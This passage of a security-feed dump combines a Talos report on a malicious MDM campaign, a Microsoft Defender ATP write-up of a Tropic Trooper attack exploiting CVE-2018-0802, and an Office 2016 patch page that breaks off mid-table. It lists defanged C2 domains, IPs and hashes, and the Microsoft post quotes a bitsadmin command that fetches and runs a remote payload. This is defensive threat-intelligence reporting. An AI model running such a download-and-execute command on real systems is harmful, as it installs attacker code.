\n \nHere are the Delphi samples: \n \n\n\n * b96fc53f321729eda24af2a0b95e5c1d39d46acbd5a565e6c5f8c81f1bf9c7a1 -> hxxp://appswonder[.]info\n * 3f463cebef1550b055ef6b4d1dad16ff1cb514f0091271ce92549e77bb5080d6 -> hxxp://referfile[.]com\n * 4b94b152293e49532e549b2538cad85e950cd16ccd948a47a632376a840626ed -> hxxp://hiltrox[.]com\n * e70a1c230ef2894363b834132bbdbb3a0edc88e81049a7c7774fa5b4ed78206b -> hxxp://scrollayer[.]com\n * e7701f81141dfd6234488e51340ba2d05901c8242a6e9a9952c297c52a3ff050 -> hxxp://twitck[.]com\n * e93f28efc1787ed5e8763cdc0417e7d5db1c9203e484350c64860fff91dab4f5 -> hxxp://scrollayer[.]com\n \nHere are the VisualBasic samples: \n \n\n\n * 6f362bc439ce09c7dcb0ac5cce84b81914b9dd1e9969cae8b570ade3af1cea3d -> hxxp://32player[.]com\n * ce0026e0eb3f4f1d3d2a003400f863900f497745f3384e430926d99206cc5ed6 -> hxxp://nfinx[.]info\n * d2c15c2043b0455cfad36f22f564b99ed46cea3891abb80eaf86093654c94dea -> hxxp://metclix[.]com/\n * d7f90e9b1129e3223a886422b3625399d52913dcc2757734a67422ac905683f7 -> hxxp://appswonder[.]info/\n * ec973e4319f5a9e8e9c28d315e7bb8153a620baa8ae52b455b68400612aad1d1 -> hxxp://capsnit[.]com/\n \nSome of the C2 servers are still up and running at this time. The Apache setup is very specific, and perfectly matched the Apache setup of the malicious IPA apps. \n \nAdditionally, we identified the infection vector of one of the Windows malware samples. The attackers used a malicious RTF (a1f2018bd61989a78247df53d808b6b513d530c47b89f2a919c59c848e2a6ac4) abusing the CVE-2018-0802 vulnerability in order to drop and execute the last binary in the list above. 
\n \nFinally, one of the VisualBasic binaries was bundled in an msiexec file with the following decoy document: \n\n\n[](<https://3.bp.blogspot.com/-4HDJcicAXBE/W1bKn2yGiII/AAAAAAAAAf0/MbEcgjUj3s4k4SbkSrwEHuibuxyTUIokwCLcBGAs/s1600/image2.png>)\n\n \nThis decoy document uses a news story image found on the India Today newspaper website [here](<https://www.indiatoday.in/india/manipur/story/naga-peace-accord-nscn-im-muivah-greater-nagalim-967260-2017-03-23>), describing the Naga peace accord. The Indian targets in this campaign are likely very interested in this topic. \n \n\n\n## Conclusion\n\n \nSince researching our original blog post, we have discovered that an actor has been operating these malicious MDMs for many years. Based on previous research regarding the Bahamut group and our research, we believe the observed infrastructure is not limited to iOS targets, but is part of a broader framework that supports Apple iOS and Windows platforms. \n \nThis actor is likely located in India, given what we see in the technical elements. While the attacker's infrastructure throughout the entirety of the operation seems very similar to the one used by the Bahamut group, and they may even be connected, it is not possible to assert with high confidence that it is Bahamut at this time. \n \nThe use of a malicious MDM is convenient and the system is well-documented. Given the effectiveness of MDM abuse, it's likely that well-funded actors will continue to move into this area. \n \nBecause enrollment into the MDM requires user interaction and acceptance, it is crucial that users are aware of this type of threat and the dangers it can pose to their data and privacy. \n \nTalos will continue to keep an eye on MDM and similar infrastructures to ensure we are reporting the latest information and forcing the bad guys to innovate. \n \n\n\n## Coverage\n\n \nAdditional ways our customers can detect and block this threat are listed below. 
\n\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or [Web Security Appliance (WSA)](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as [Next-Generation Firewall (NGFW)](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>), [Next-Generation Intrusion Prevention System (NGIPS)](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection for all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. 
\n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on[ ](<https://www.snort.org/products>)[Snort.org](<https://www.snort.org/products>). \n \n\n\n## IOCs\n\n \niOS Applications \n \n\n\n * 422e4857614cc603f2388eb9a6b7bbe16d45b9fd0a9b752f02c107887cf8cb3e imo.ipa\n * e3ceec8676e2a1779b8289e341874209a448b11f3d81834a2faae9c494267602 Safari.ipa\n * bab7f61ed0f2b085c02ff1e4305ceab4479455d7b4cfba0a018b73ee955fcb51 Telegram.ipa\n * fbfaed75aa855c7db486edee15359b9f8c1b394b0b02f77b22500a90c53cb423 WhatsApp.ipa\n \nMDM Domain: \n \n\n\n * ios-update-whatsapp[.]com\n \nC2 Domains: \n \n\n\n * hytechmart[.]com\n \nPE32 Samples: \n \n\n\n * b96fc53f321729eda24af2a0b95e5c1d39d46acbd5a565e6c5f8c81f1bf9c7a1\n * 3f463cebef1550b055ef6b4d1dad16ff1cb514f0091271ce92549e77bb5080d6\n * 4b94b152293e49532e549b2538cad85e950cd16ccd948a47a632376a840626ed\n * e70a1c230ef2894363b834132bbdbb3a0edc88e81049a7c7774fa5b4ed78206b\n * e7701f81141dfd6234488e51340ba2d05901c8242a6e9a9952c297c52a3ff050\n * e93f28efc1787ed5e8763cdc0417e7d5db1c9203e484350c64860fff91dab4f5\n * 6f362bc439ce09c7dcb0ac5cce84b81914b9dd1e9969cae8b570ade3af1cea3d\n * ce0026e0eb3f4f1d3d2a003400f863900f497745f3384e430926d99206cc5ed6\n * d2c15c2043b0455cfad36f22f564b99ed46cea3891abb80eaf86093654c94dea\n * d7f90e9b1129e3223a886422b3625399d52913dcc2757734a67422ac905683f7\n * ec973e4319f5a9e8e9c28d315e7bb8153a620baa8ae52b455b68400612aad1d1\n \nPE32 C2 servers: \n \n\n\n * hxxp://appswonder[.]info\n * hxxp://referfile[.]com\n * hxxp://hiltrox[.]com\n * hxxp://scrollayer[.]com\n * hxxp://twitck[.]com\n * hxxp://scrollayer[.]com\n * hxxp://32player[.]com\n * hxxp://nfinx[.]info\n * hxxp://metclix[.]com/\n * hxxp://capsnit[.]com/\n \nMalicious RTF Samples: \n \n\n\n * a1f2018bd61989a78247df53d808b6b513d530c47b89f2a919c59c848e2a6ac4\n\n", "modified": "2018-07-25T11:53:23", "published": "2018-07-24T22:24:00", "id": "TALOSBLOG:D034163DF19149D9BA90463DA51A05F9", 
"href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/-9jjaXrJwBo/Mobile-Malware-Campaign-uses-Malicious-MDM-Part2.html", "type": "talosblog", "title": "Advanced Mobile Malware Campaign in India uses Malicious MDM - Part 2", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mssecure": [{"lastseen": "2018-12-03T23:45:41", "bulletinFamily": "blog", "cvelist": ["CVE-2018-0802"], "description": "Several weeks ago, the Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>)) team uncovered a new cyberattack that targeted several high-profile organizations in the energy and food and beverage sectors in Asia. Given the target region and verticals, the attack chain, and the toolsets used, we believe the threat actor that the industry refers to as Tropic Trooper was likely behind the attack.\n\nThe attack set off numerous Windows Defender ATP alerts and triggered the device risk calculation mechanism, which labeled the affected machines with the highest risk. The high device risk score put the affected machines at the top of the list in Windows Defender Security Center, which led to the early detection and discovery of the attack.\n\nWith the high risk determined for affected machines, [Conditional access](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-atp/conditional-access-windows-defender-advanced-threat-protection>) blocked these machines' access to sensitive content, protecting other users, devices, and data in the network. IT admins can control access with Conditional access based on the device risk score to ensure that only secure devices have access to enterprise resources.\n\nFinally, automatic investigation and remediation kicked in, discovered the artifacts on affected machines that were related to the breach, and remediated the threat. 
This sequence of actions ensured that the attackers no longer had a foothold on affected machines, returning machines to a normal working state. Once the threat was remediated, the risk score for those machines was reduced and Conditional access restrictions were lifted.\n\n## Investigating alert timelines and process trees\n\nWe discovered the attack when Windows Defender ATP called our attention to alerts flagging several different suspicious activities like abnormal Office application activity, dubious cross-process injections, and machine-learning-based indications of anomalous execution flows. The sheer volume and variety of the alerts told us something serious was going on.\n\n\n\n_Figure 1. Multiple alerts triggered by the attack_\n\nThe first detection related to the attack was fired by suspicious _EQNEDT32.exe_ behavior, which led us to the entry vector of the attack: a malicious document that carried an exploit for CVE-2018-0802, a vulnerability in Microsoft Office Equation Editor, which the actor known as Tropic Trooper has exploited in previous campaigns. 
Using [Office 365 ATP](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>) Threat Explorer, we found the specific emails that the attackers used to distribute the malicious document.\n\nUsing Windows Defender Security Center, we further investigated the detected executable and found that the attackers used _bitsadmin.exe_ to download and execute a randomly named payload from a remote server:\n \n \n bitsadmin /transfer Cd /priority foreground http:/<IP address>:4560/.exe %USERPROFILE%\\fY.exe && start %USERPROFILE%\\fY.exe\n\nMachine timeline activity showed that the executed payload communicated to a remote command-and-control (C&C) server and used the [process hollowing](<https://cloudblogs.microsoft.com/microsoftsecure/2017/07/12/detecting-stealthier-cross-process-injection-techniques-with-windows-defender-atp-process-hollowing-and-atom-bombing/>) technique to run code in a system process's memory.\n\nIn some cases, the attacker ran additional activities using malicious PowerShell scripts. Windows Defender ATP's [Antimalware Scan Interface (AMSI)](<https://docs.microsoft.com/en-us/windows/desktop/amsi/antimalware-scan-interface-portal>) sensor exposed all the attacker scripts, which we observed to be meant mostly for data exfiltration.\n\n\n\n_Figure 2. Process tree_\n\nUsing the timeline and process tree views in Windows Defender Security Center, we were able to identify the processes exhibiting malicious activities and pinpoint exactly when they occurred, allowing us to reconstruct the attack chain. As a result of this analysis, we were able to determine a strong similarity between this new attack and the attack patterns used by the threat actor known as Tropic Trooper.\n\n\n\n_Figure 3. Campaign attack chain_\n\n## Device risk calculation and incident prioritization\n\nThe alerts that were raised for this attack resulted in a high device risk score for affected machines. 
Windows Defender ATP determines a device risk score based on different mechanisms. The score is meant to raise the risk level of machines with true positive alerts that indicate a potential targeted attack. The high device risk score pushed the affected machines to the top of the queue, helping ensure security operations teams can immediately notice and prioritize them. More importantly, elevated device risk scores trigger automatic investigation and response, helping contain attacks early in their lifespan.\n\nIn this specific attack, the risk calculation mechanism gave the affected machines the highest risk based on cumulative risk. Cumulative risk is calculated based on the multiple components and multiple types of anomalous behaviors exhibited by an attack across the infection chain.\n\n## Windows Defender ATP-driven conditional access\n\nWhen Windows Defender ATP raises the device risk score for machines, as in this attack, the affected devices are marked as being at high risk. This risk score is immediately communicated to Conditional access, resulting in the restriction of access from these devices to corporate services and data managed by [Azure Active Directory](<https://azure.microsoft.com/en-us/services/active-directory/>).\n\nThis integration between Windows Defender ATP and Azure Active Directory through Microsoft Intune ensures that attackers are immediately prevented from gaining access to sensitive corporate data, even if attackers manage to establish a foothold on networks. When the threat is remediated, Windows Defender ATP drops the device risk score, and the device regains access to resources. 
**[Read more about Conditional access here](<https://techcommunity.microsoft.com/t5/What-s-New/Conditional-access-Ensuring-that-only-secure-users-and-devices/ba-p/292510>)**.\n\n## Signal sharing and threat remediation across Microsoft Threat Protection\n\nThreat signal sharing across Microsoft services through the [Intelligent Security Graph](<https://cloudblogs.microsoft.com/microsoftsecure/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) ensures that threat remediation is orchestrated across [Microsoft Threat Protection](<https://techcommunity.microsoft.com/t5/Security-Privacy-and-Compliance/Announcing-Microsoft-Threat-Protection/ba-p/262783>). In this case, Office 365 ATP blocked the related email and malicious document used in the initial stages of the attack. Office 365 ATP had determined the malicious nature of the emails and attachment at the onset, stopping the attack's entry point and protecting Office 365 ATP customers from the attack.\n\nThis threat signal is shared with Windows Defender ATP, adding to the rich threat intelligence that was used for investigation. Likewise, Office 365 ATP consumes intelligence from Windows Defender ATP, helping make sure that malicious attachments are detected and related emails are blocked.\n\nMeanwhile, as mentioned, the integration of Windows Defender ATP and Azure Active Directory ensured that affected devices are not allowed to access sensitive corporate data until the threat is resolved. 
\nWindows Defender ATP, Office 365 ATP, and Azure Active Directory are just some of the many Microsoft services now integrated through Microsoft Threat Protection, an integrated solution for securing identities, endpoints, user data, cloud apps, and infrastructure.\n\n## Conclusion\n\nThe new device risk calculation mechanism in [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) raised the priority of various alerts that turned out to be related to a targeted attack, exposing the threat and allowing security operations teams to immediately take remediation actions. Additionally, the elevated device risk score triggered automated investigation and response, mitigating the attack at its early stages.\n\nThrough [Conditional access](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-atp/conditional-access-windows-defender-advanced-threat-protection>), compromised machines are blocked from accessing critical corporate assets. 
This protects organizations from the serious risk of attackers leveraging compromised devices to perform cyberespionage and other types of attacks.\n\nTo test how these and other advanced capabilities in Windows Defender ATP can help your organization detect, investigate, and respond to attacks, [**sign up for a free trial**](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>).\n\n \n\n \n\n_**Hadar Feldman** and **Yarden Albeck**_ \n_Windows Defender ATP team_\n\n \n\n \n\n## Indicators of attack (IoCs)\n\n### Command and control IP addresses and URLs:\n\n * 199[.]192[.]23[.]231\n * 45[.]122[.]138[.]6\n * lovehaytyuio09[.]com\n\n### Files (SHA-256):\n\n * 9adfc863501b4c502fdac0d97e654541c7355316f1d1663b26a9aaa5b5e722d6 (size: 190696 bytes, type: PE)\n * 5589544be7f826df87f69a84abf478474b6eef79b48b914545136290fee840fe (size: 727552 bytes, type: PE)\n * 073884caf7df8dafc225567f9065bbf9bf8e5beef923655d45fe5b63c6b6018c (size: 195123 bytes, type: docx)\n * 1aef46dcbf9f0b5ff548f492685d488c7ac514a24e63a4d3ed119bfdbd39c908 (size: 207444 bytes, type: docx)\n\n \n\n \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? 
Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>) and [Windows Defender Security Intelligence](<https://www.microsoft.com/en-us/wdsi>).\n\nFollow us on Twitter [@WDSecurity](<https://twitter.com/WDSecurity>) and Facebook [Windows Defender Security Intelligence](<https://www.facebook.com/MsftWDSI/>).\n\n \n\nThe post [Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks](<https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/>) appeared first on [Microsoft Secure](<https://cloudblogs.microsoft.com/microsoftsecure>).", "modified": "2018-11-28T21:46:48", "published": "2018-11-28T21:46:48", "id": "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/", "type": "mssecure", "title": "Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mskb": [{"lastseen": "2021-01-01T22:47:05", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-11882"], "description": "<html><body><p>Description of the security update for Office 2016: November 14, 2017.</p><h2>Summary</h2><div><p>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. 
To learn more about these vulnerabilities, see <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882\">Microsoft Common Vulnerabilities and Exposures CVE-2017-11882</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of Office 2016 installed on the computer.</p><p>Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2016. It doesn't apply to the Office 2016 Click-to-Run editions, such as Microsoft Office 365 Home\u00a0(see\u00a0<a href=\"https://blogs.technet.microsoft.com/office_integration__sharepoint/2016/06/23/determining-your-office-version-msi-vs-c2r/\">Determining your Office version</a>).</p></div><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. 
For more information about how to get security updates automatically, see <a href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the stand-alone package for this update, go to the <a href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011262\">Microsoft Update Catalog</a> website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.</p><ul><li><a href=\"http://www.microsoft.com/download/details.aspx?familyid=da67f5f5-ae58-401e-8b6a-184860b867e8\">Download the security update KB4011262 for the 32-bit version of Office 2016</a></li><li><a href=\"http://www.microsoft.com/download/details.aspx?familyid=6fc31285-41a0-47a5-a738-d591cc863519\">Download the security update KB4011262 for the 64-bit version of Office 2016</a></li></ul><h2>More Information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see <a href=\"https://support.microsoft.com/en-us/help/20171114\">security update deployment information: November 14, 2017</a>.</p><h3>Security update replacement information</h3><p>This security update doesn't replace any previously released 
update.</p><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Package Name</th><th>Package Hash SHA 1</th><th>Package Hash SHA 2</th></tr><tr><td>eqnedt322016-kb4011262-fullfile-x64-glb.exe</td><td>607BF4114E10E7A20A6ADB328C083A081F4C219C</td><td>CA3F40EEA153711EFC5C9BA5AC1E49AAB31C495A38C59F57FF3D20557439D8A1</td></tr><tr><td>eqnedt322016-kb4011262-fullfile-x86-glb.exe</td><td>940CCD5E3D1E7AFFFB52B7B4F03DE1F3BBECCEB0</td><td>A760FF51E01B72AFE52D8CD3D90189158E10B31D5DD607ED95154638085E0935</td></tr></tbody></table><h3>File information</h3><p>The English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">For all supported x86-based versions of Office 2016</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File identifier</th><th>File name</th><th>File version</th><th>File 
size</th><th>Date</th><th>Time</th></tr><tr><td>eqnedt32.exe_1025</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1026</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1028</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1029</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1030</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1031</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1032</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1033</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1035</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1036</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1037</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1038</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1040</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1041</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1042</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1043</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1044</td><td>eqnedt
32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1045</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1046</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1048</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1049</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1050</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1051</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1053</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1054</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1055</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1057</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1058</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1060</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1061</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1062</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1063</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1066</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr>
<tr><td>eqnedt32.exe_1081</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1086</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1087</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_2070</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_2074</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_3082</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_9242</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_2052</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>25-Oct-17</td><td>01:26</td></tr></tbody></table></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">For all supported x64-based versions of Office 2016</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File identifier</th><th>File name</th><th>File version</th><th>File 
size</th><th>Date</th><th>Time</th></tr><tr><td>eqnedt32.exe_1025</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1026</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1028</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1029</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1030</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1031</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1032</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1033</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1035</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1036</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1037</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1038</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1040</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1041</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1042</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1043</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1044</td><td>eqnedt
32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1045</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1046</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1048</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1049</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1050</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1051</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1053</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1054</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1055</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1057</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1058</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1060</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-